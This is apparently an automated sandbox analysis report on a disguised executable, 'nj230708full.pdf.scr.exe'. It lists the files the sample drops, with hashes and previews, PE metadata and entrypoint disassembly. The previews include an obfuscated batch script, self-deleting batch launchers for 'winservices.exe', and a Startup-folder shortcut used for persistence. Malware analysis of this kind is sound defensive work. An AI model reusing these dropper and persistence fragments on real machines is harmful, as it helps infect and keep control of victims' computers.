Preview:	.3....J....C>EB.u.i+..L.o.V..L.PF. E....bjO..E;...1...0F.T..E...bA8..HM..z......9c4...A1.\....].LD..U..r.y@.Kj..1e....Jj.n!.C.b.....F.....J.R..f./..g..f[..zD..lso....).R,....Tw.!1.U/B.3.....k.......Z.M.8\.{..Vrj./.*G....%.hYV.L.vg"...e+y...r...].}Z.3C}..9..2..A...o...@....:E..U.E.2.\|.X`b........s.....CNi...t?.t...L..m..-.9Q...;....j..x.......Q...O....i....l.....e....(8...W....3A...g.V,eF...)Y..B.....@.?`.&G.P...HBo......a..G+.....>!I..2G#K...0...k..h.M?c.....&..&. :m..b-&.!..XyH..#.Qb..gj.du..."..;@)ts...G!v[....\m%k...e...a..k\|.u.....Y._.#.......x.,.{'Ho..s.\|N.K..sh..C...XfE..4.P...?...$..=.]/.yr....h..~...]p..4"G..2...\|0......._..i .;..\.w...y...P.W.u.zA.4..I.g.u...........pE...+.$<..P.)=./..d..Z.}E.p.)....:\|@..p..Hhq.!.1..B..n.{.) ...uemU..pk2x0f..D.s...i.W%.-C.6...o.....B..L3._!...5..YG..&._K.H..6"CPg...0K..h6.#.[.2.4R.-<<.Yed....E<.J.....7;......a....+K..{...l....H.-..y..fR~l.......x....8..Z.v}.=7..].Z.ObL.)A.9.V..vF...a... ]..a.G....sY.I.7B

C:\Users\user\AppData\Local\Temp\Shopping

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	7.997775892818001
Encrypted:	true
SSDEEP:	1536:rgzbrFlf9E5LKJpyGHCCRsirUB9PrTcUB8LGW0UQyqc06FvTfHh8UD/4:+rbYLmyIFRZUMyHW06hlB94
MD5:	907FF27FE2F074A39D39A3289545D312
SHA1:	2D63251C4B4538C2BD0005B2294D01F6A43E1955
SHA-256:	93F2D28948FEDD87E1F4D5AA6E6301C88B138125A3F7EF0BF2023A1F2E52F0AA
SHA-512:	90BADEB83667E072E4B583230237A1630A5CC33B1EB6374A83986FAEEE6CFA0C330CCC9C3895FA27A9386527019454D89002A518961C607618C6097938E63AD5
Malicious:	true
Preview:	'.n.g.KQ"..P......K...&%..0....Z....:.PRG...G.>N.k..'.zK"H.H:+..a.uC,F..{... >...v.c...>W.......r^./..3`_..F.4x.E.[X6=.;...J&.r...X2...,...N.d....Lai$.]..8.P'fK.....6Y..@....m+..n....=.......{....U..a........9.....<._......O#...0.H.~.X...r.@.G..=pC...F)..3(i.8........5.B...v...o.@.L]...uA'....q. .Q.."...I............\|B....-.........H....s._b...^.!.Fu..i...F8U^..(..5..m;v."0.2.b....&.=.(..dH..y_6...?....J...@X"........M....u.V\....Q....9.4.A......!e.b.W....bh.J..Yzc.O..B@H5......._..\|..YFe..D..x...?....Yb...(.8..o.....8.T..M.Nu....L....H..j.-..0A>.m..s.'.r....`..".G......4...@..^.j..o.4.p0.~.;X....C.ht.9.bI..D......7I].....3^.n.a..P..D.....4.....+...6.E#.....<.p....<...........x.G.aX..1{...4.:.14.........O....-L.O.~G;..6.4...!.y...Q..O...i.5.{.n.....P...Q.^..\...a.m_..J.,....u.c.,......_.a..h...BzVFA.......R.`1t..Tz..W......s.....n;...4.........>I.s.0..uW..y.D...a..Hp.7.7b.>...m......A..E..oL..).._.Pf......E..U9.........@z.t...

C:\Users\user\AppData\Local\Temp\Skirts

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	933170
Entropy (8bit):	6.62668075127837
Encrypted:	false
SSDEEP:	24576:MJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:MC7hGOSPT/PxebaiO
MD5:	D1670FA3B18DC68DFA7240100CC66286
SHA1:	B293D460A085AEFF86620F11A14E0BD7C8CEC2CF
SHA-256:	A90890FB22C02D1F4CD668017CC76830D412011D2D01C48306820F870A7A9817
SHA-512:	DE421D7B0A6CB4E3C4BC3C3C3D500C03C5FC6F2CD0E2A3EF19FBACA7921F80E629DB42F1A42CB42D25E87B1B29DE9052CB785D68483678DA6CAD70DA9F2629EF
Malicious:	false
Preview:	W.5H#M..\|#M.j.PWWWWh...PWh .I.W..5 .I.W.5\|#M..x#M...W.5\|#M..._^.U...@.H#M.V3..$)M.j..E.0....E.+....u..E......E.u...0.I..E.E..E..E..E.E.P.u..E.\.I..E.!@...$.I.h..I.f..#M.....I..()M..E.P.E......E.;.......I.j.j.j!j.j.....I.h.....5$)M..\|)M...(.I.Pj..5\|)M.....I..5.)M.^..... $M..0$M.V.@.. $M...I.3..$$M..($M..,$M..+....d$M..!.....$M.....Y..h..I.....z... $M.^...V..N..Y...N..Y...N$.Y....^.SV.5..I.3.W..j.XS...G.f.G...._.._.._.._.j[.G.......Sj..G)..Sh.....G&..Sh.....G'..Sj..G(..Sj..G$..G%_^[.V..&..N..W...........Y..........Y..........X..........X.........>..j..G.....$..I.. .......I..F...^.j..A.Z. ..@....u....3.3...@.A..Q..Q..Q..Q..A,...Q .Q(.Q0.U..W............Vj@.....Y.u...........O..N8.w.^.._]...U..V.u.W..V.g........F..O .G..F..G..F..G..F .a..P.....F0.G0.._^]...3....(M.d...3.f..%M.A. %M.j...$%M...(%M...,%M..<%M.f..'M....&M....'M......X...'M..0%M..4%M...8%M..U...8.. $M...I.3....(M...I....(M....(M.VQf...(M..p.... $M..@.. $M. .I.. $M..H...l......$M.3...$M...$M...$M...$M.......$M.

C:\Users\user\AppData\Local\Temp\Swing

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	ASCII text, with very long lines (2751), with CRLF line terminators
Category:	dropped
Size (bytes):	27809
Entropy (8bit):	5.087796772412585
Encrypted:	false
SSDEEP:	768:C4u2+CKfkCldM18h70JWjxcxuOczDQWlm2k+yGfDydxuOc0ziwgeTcDnsQTk88dV:C4u2+nnl+ahw/as+opiXK
MD5:	49B5FE73FB3CE14CC33BB20AA2FFF02B
SHA1:	2E2B6517667189A46C23B407EDEC120B79C7626E
SHA-256:	79967F8CD81007DED7841643B89CDBE45F735BF8B8CF6608EE8FE166797C47B8
SHA-512:	03625342B90D8BA5000855B77223AF587A65FEC205FED5C37FF2D5FDD63C1712E44931CE2DD4261E13760873CB20EEEE04987C36019B770AB8AD9C4352D624D5
Malicious:	false
Preview:	Set Luggage=d..DILBHttp-Magazine-Pixel-Calcium-Quilt-..zLqFirmware-Involve-Respected-Kodak-Sofa-Tion-..SPTEWikipedia-Abandoned-Dsc-Enhancing-..kiVar-Trusts-..YqOSAnswer-..Set Observations=s..CZwkTest-Missions-Sewing-Fireplace-Insert-Parenting-Bags-Completing-..rISRehabilitation-Mechanics-Angola-Regulations-Increasing-Effectively-Another-..tWYWake-..gDKTUpc-Cameroon-..FOOsInsight-Reflect-Express-..UgWSomewhat-Substance-Sims-Manually-Remark-..pQSpeaking-Dictionaries-Kijiji-Transexual-Sensitive-Numeric-..Set Answering=4..ZDjAside-Diseases-..rovAfter-Rope-Sweet-Cdna-Financial-Majority-..RjClassified-Russia-Medical-Suffered-Lf-Beds-Cumulative-..ABygWedding-Makes-..tDkuChanges-Digest-Trend-Biz-Mathematics-Toolbox-..vOPGThread-Sites-Server-Preston-Duties-..posTerminal-Lender-Republican-Method-Throw-Nominations-..bnGBreaking-..AGWages-Colour-Lolita-Everybody-Recreation-Remainder-Investigators-..Set Vs=E..oSDiagnosis-Insights-Departmental-..LJToolbar-Participant-Tba-Poems-Pastor-Royalty-Hawaiia

C:\Users\user\AppData\Local\Temp\Swing.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (2751), with CRLF line terminators
Category:	dropped
Size (bytes):	27809
Entropy (8bit):	5.087796772412585
Encrypted:	false
SSDEEP:	768:C4u2+CKfkCldM18h70JWjxcxuOczDQWlm2k+yGfDydxuOc0ziwgeTcDnsQTk88dV:C4u2+nnl+ahw/as+opiXK
MD5:	49B5FE73FB3CE14CC33BB20AA2FFF02B
SHA1:	2E2B6517667189A46C23B407EDEC120B79C7626E
SHA-256:	79967F8CD81007DED7841643B89CDBE45F735BF8B8CF6608EE8FE166797C47B8
SHA-512:	03625342B90D8BA5000855B77223AF587A65FEC205FED5C37FF2D5FDD63C1712E44931CE2DD4261E13760873CB20EEEE04987C36019B770AB8AD9C4352D624D5
Malicious:	false
Preview:	Set Luggage=d..DILBHttp-Magazine-Pixel-Calcium-Quilt-..zLqFirmware-Involve-Respected-Kodak-Sofa-Tion-..SPTEWikipedia-Abandoned-Dsc-Enhancing-..kiVar-Trusts-..YqOSAnswer-..Set Observations=s..CZwkTest-Missions-Sewing-Fireplace-Insert-Parenting-Bags-Completing-..rISRehabilitation-Mechanics-Angola-Regulations-Increasing-Effectively-Another-..tWYWake-..gDKTUpc-Cameroon-..FOOsInsight-Reflect-Express-..UgWSomewhat-Substance-Sims-Manually-Remark-..pQSpeaking-Dictionaries-Kijiji-Transexual-Sensitive-Numeric-..Set Answering=4..ZDjAside-Diseases-..rovAfter-Rope-Sweet-Cdna-Financial-Majority-..RjClassified-Russia-Medical-Suffered-Lf-Beds-Cumulative-..ABygWedding-Makes-..tDkuChanges-Digest-Trend-Biz-Mathematics-Toolbox-..vOPGThread-Sites-Server-Preston-Duties-..posTerminal-Lender-Republican-Method-Throw-Nominations-..bnGBreaking-..AGWages-Colour-Lolita-Everybody-Recreation-Remainder-Investigators-..Set Vs=E..oSDiagnosis-Insights-Departmental-..LJToolbar-Participant-Tba-Poems-Pastor-Royalty-Hawaiia

C:\Users\user\AppData\Local\Temp\Texture

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	10645
Entropy (8bit):	6.345885600174978
Encrypted:	false
SSDEEP:	192:plFWpOqoPzWaJNMqWzULI7NNiPN3UEdcQMMKAVhSo0QfLPlUZOZcP/u3:plFuOqohnWzR7NNilkEdpMMKAdbLPlUY
MD5:	D0A0CF2C907855F1064DDF91B76F21C3
SHA1:	5245EB91F26D81B12B6AE5FC21F253E92F3A44D3
SHA-256:	3D049CC1BF849CEECED53798B4F924D4F57E77A632EDE1EF539C1EFEE87BDE64
SHA-512:	E3B9038726AC30EAD9D7020D30C05DC325E5DAD506AF27C6C2CF6F3B59D51B37B8A907E4D531E1B0C9BB74DC073B6EA28A64965A4125B62C617EBDC9CDCC814A
Malicious:	false
Preview:	toolkitczechhappenwestminster..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B.................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Waiver

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997000418043724
Encrypted:	true
SSDEEP:	1536:cdF7BpoDdq3rzIsuVqyG/7j2Ah4NuV33ixP:cT7ByDw3PIsIeHN3W
MD5:	B1F9D3ABCF001BD1BB798315FDFE39CB
SHA1:	25F1C325A42163915E17A34DC69FE36F67223FCC
SHA-256:	4DED02B2418A07ABB23445AB56CCAD835667F9F2A96D1A030F738209B0F865DA
SHA-512:	CA88346D6CB2393240C3D2296BA5D54EF6B94DD7FDBB5C1BE3A104AB0FB64542C43351664BF8FF5362E180F393A60B626551D443859051453FD6BA15C16CC217
Malicious:	true
Preview:	q\|.....J....2............P..u.QT..?_8O/3.}.(u....6..Qz....HUE.91..QF..j....n.J....\.,1..e....D}...>.6Q=...3..Gy..r.......f.....+.. .p.=.&.pe...R.@.".{.\..vDxZ0....p.](p9s.Ieyoo],.p..b..\....(53..$D.`..... .&........S(.0.G..^..Q.D.C/z..r8I.i.t..yv9wGM0...GY..,j..kMu.....A.-.=..2~....}.h.H....p..t.U.I)....v......]K...wE..EVs...$%.b...;.G}.......r.aQ.J...rp.R.....%y.>.V..j.F..i......p.U)..p...>.^....\...'.)..:o.+B....x.<w..R.....0..RDCT_....[...Q{.....v..w.V....`.......}....._.jsA@.........1.......g[<..........G.a.....=....U..S.I....fWJ..'...1\|H.%..r...4.....l.f)CFpRr.\._....#....[o.@..&.j{.7.3..._.....+..$.N%X>.v.jO.U...->w..#_.>/....n........+T.-...d.....ft...\|...}c.Gy.-..."... .V.(....a ...\|\|:.&l#....D..+4.2.\..Y..64.Ny..)z.s.....+...S.......j.-5..L....B'..A...T\.......0.N..+.....H2..........#c...Nv.)yd.l.!..U.a..3.o.'.%X....\|(1..y.9..Q.k..1..{.9... Wk. ..RI....+zN.t.....v......C.p....."-.."..T..o...E.R#+..Kf.....>.2..3f.(.g...S

C:\Users\user\AppData\Local\Temp\Wherever

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998207109379489
Encrypted:	true
SSDEEP:	1536:N+coHtKdb+gVOxHLD7vI21hOcq8pnB3X4XgC/5kBt7F9OVCjhpQvop:gcBdb+e8HLD7vjoYnB3IpGv71hph
MD5:	D09AF5D18CAD12006C6AC381273B407C
SHA1:	95063CF75867DE0BF91A37662F46BF5AF236EA15
SHA-256:	2CDA0FE6BBFF9C7BF7252EC356F68881C521ED6CEEEEBC9542AD87B943390D00
SHA-512:	9B9662AF5336D531A87B9D6DAC702B9F664C9DC3410424C82FC4F06BC539ADC07F9A95924A4FB7904AF2CD211B0E5634662218AE60F9681310AECDB395AD8648
Malicious:	true
Preview:	.Xe...u./l+..\|..G.A..<j..I.FO..]7M.&.h'.7......XK1...CH..D^...PAi.b{..~..A.<^S......9..t.x...Z...\|..Y.P.H.C.."...<....2yt.U..1.%....ig.&6../;j.T..P0..._..F....gL.j..j...$y.zr....#.'6.C.^,...._..8.......Uvn$......v..@&......c..=..h.....F.7U.Z`...l..8 ...j......0.<..9o..)...0c......o.....)E.:m.k....-..E..Ws.p...X.i.8I..9R.%....../l.A..E..6..@a..F....P..A..\..N].Ub.M.x.....V..~.].2=c.[+.W....!....._m4...T.G...p...P..."...[....\..^.......&...s.w...]...3.+.~..........N.y..O/)....@... .^.J.;..X....P.D"eJCm.......yM.J:.z`#.2{.YY}e..>~.....6.cf..7......a.....VL.;.{..{}.v.F.LC.......W.he>..5z....I.......9..P=..-..iu..C.......O..."..$....q.k...o{..w....~..t.Q.}.Vv......FU....q].`T..[..$...'5....G<p.y..t...3@g.....h..S:...C.('..W....=..h%.w.kH`.}...NH.....i..Y...f...r4@.mAy .6...."qrAm...T...p.R{u.4....p...i...QO...ON......Z[...\|....5.VJ...Y...fqlq.l.):....-...P.0..=....\.*.`lV.Q.h...aO..P.../k.3.a\|o......B...F......f.KufCF...`}...)8..p.LR..$.

C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	5.080572722555193
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5ot+kiEaKC5DjtHovmqRDt+kiE2J5xAInTRINk3uh1ZPy:hWKqTtT6wknaZ5DZovmq1wkn23fT3e7k
MD5:	287FA11C5FCCF7A7D6DD244ABFC5D21D
SHA1:	4D6CDA6524207B589EED577F3DA000647344813D
SHA-256:	56420A66B57CC577706DD6FBC97D839051F0AF3416B63EE52634749993F7D180
SHA-512:	C1644EFE423DB197828D2AD40F689FD529437AC94295CED2D39B1B063084A16938DD130671D4AA9462FF6F8C8A424572294A17660B4EC5DF6F87382B9A882E73
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\winservices.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpB8CF.tmp.bat" /f /q..

C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	5.067669496748741
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5ot+kiEaKC5DjtHovmqRDt+kiE2J5xAInTRINCZPy:hWKqTtT6wknaZ5DZovmq1wkn23fThk
MD5:	4CAB3D41DF129A41EACFA2D616AE024F
SHA1:	DA80F379A42047FA0C7F412321BDEF82D486BF64
SHA-256:	291C8DDEA96E6264FB40E37E8E2894EE15E2AF9432F0E0F942C7735897AA7F0B
SHA-512:	56F7872F060002F7CF62FB8187DB02F75749E04C4B0F6BA0E0D548E80B12A034D346497C7249E1D11BFB29D3B67E7FEE152C1B3387985796E4B17CF8023FAA48
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\winservices.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpBB7A.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\DataLogs\DataLogs.conf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.820010902339992
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5gSBHGZi+6RLF:HRYF5yjowkn23gSEZz6p
MD5:	2A2A472467E1D22EDCFAEC8BA7EAF011
SHA1:	D2976F15FBE91E2AF7A5D88ADF4E1694108593C0
SHA-256:	5B95910D271F9EC011E9F591F86B457108564A2218223684B4EF0092852D45ED
SHA-512:	69732F4DC96560A72A7F47CE16EBF61681EAD2923F548BFA9CD25FF25ED9EE63E477240CFF221F7E895E664D373FEC5901A1F43EB94638B1B56340C3F55864D1
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" ..

C:\Users\user\AppData\Roaming\winservices.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	262432
Entropy (8bit):	6.179415524830389
Encrypted:	false
SSDEEP:	3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
MD5:	8FDF47E0FF70C40ED3A17014AEEA4232
SHA1:	E6256A0159688F0560B015DA4D967F41CBF8C9BD
SHA-256:	ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
SHA-512:	BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.].........."...0..\|...B......:.... ........@.. ...............................L....`....................................O........>.............. A........................................................... ............... ..H............text...Xz... ...\|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B........................H........)...................\|...........................................{.......v.(=....r...p({...-..+..}........0..%........(....-......(z.....&..}..............................0..5........(....-...-.r+..ps>...z.....i(z.....&..}......................%......>....(?...(....N..(@....oA...(....:...(B...(....:...(C...(....*....(........0..G........(....,....(....-...}......r...p(x...&.(v.....}......&..}....................7.......0..f........-.r7..ps>...z .....

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\winservices.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	298
Entropy (8bit):	4.924206445966445
Encrypted:	false
SSDEEP:	6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
MD5:	932782CF70ED00D22C0B08B5027B4E31
SHA1:	78F460A2155D9E819B8452C281285D7E0A7AC14F
SHA-256:	F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
SHA-512:	C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
Malicious:	false
Preview:	Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992794244032642
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nj230708full.pdf.scr.exe
File size:	2'697'122 bytes
MD5:	e8285f01dff90fca4b37d4df7da03c4b
SHA1:	fb19156b1aab033ed8b5212821a8b039a2c363d9
SHA256:	edc325712bb62fcd4fe96f6bf63559449b9158b816768a8122dad070e8aaf44e
SHA512:	f39a69d1c546adb1ba1b744d02bc6407e36c51396d825c03957b584ac22ce1a0b21846a9181e57cb186d34d40cb32bed2662e0bf2caca1bd99f74ee457154a0d
SSDEEP:	49152:862EA6E97H+leX14OKwpGpKqYygbN3+3+C+m32sBHEAdpvQKQKd719O03WMl:862nJIO14OKT12Out22sBHXIKQe7e0x
TLSH:	37C5339690AD244EE0702371356B27338E65DC58F230887F9398F78934B2799D97FA17
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...d...B...8.....

File Icon


Icon Hash:	74e0d4d4e4f4d4d4

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F45E4E1C2FBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F45E4E1BFDDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F45E4E1BFCBh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F45E4E198CAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F45E4E1BCA1h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F45E4E19953h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F45E4E198CAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x9f72	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2902da	0x1ec8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x9f72	0xa000	552ec742cf95f4a652291022f75b092c	False	0.6631591796875	data	6.75582644476892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0xf32	0x1000	2fe76ae222e0e826e10d3019ffe08d52	False	0.60009765625	data	5.52406023468249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4280	0x38e9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9211339144759421
RT_ICON	0xf7b6c	0x16e2	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.99556162512803
RT_ICON	0xf9250	0xb79	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.00374531835206
RT_ICON	0xf9dcc	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.21307973962571197
RT_ICON	0xfc434	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.2966757741347905
RT_ICON	0xfd55c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5070921985815603
